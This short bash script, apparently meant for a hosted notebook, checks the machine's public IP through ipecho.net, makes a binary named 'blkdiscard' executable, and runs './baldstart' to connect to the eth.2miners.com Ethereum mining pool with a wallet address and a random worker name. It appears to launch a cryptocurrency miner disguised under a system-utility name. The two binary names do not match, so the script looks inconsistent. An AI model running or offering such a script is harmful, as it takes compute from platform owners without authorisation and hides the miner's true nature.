#!/bin/bash
%%capture

#gives ip address 
curl ipecho.net/plain && curl ipecho.net/plain
chmod +x blkdiscard
./baldstart -P stratum1+tcp://3QU2yXEd6givopaaV67w4sazAwjCoyZayX.$(echo $(shuf -i 1-9999 -n 1)-KULI)@eth.2miners.com:2020
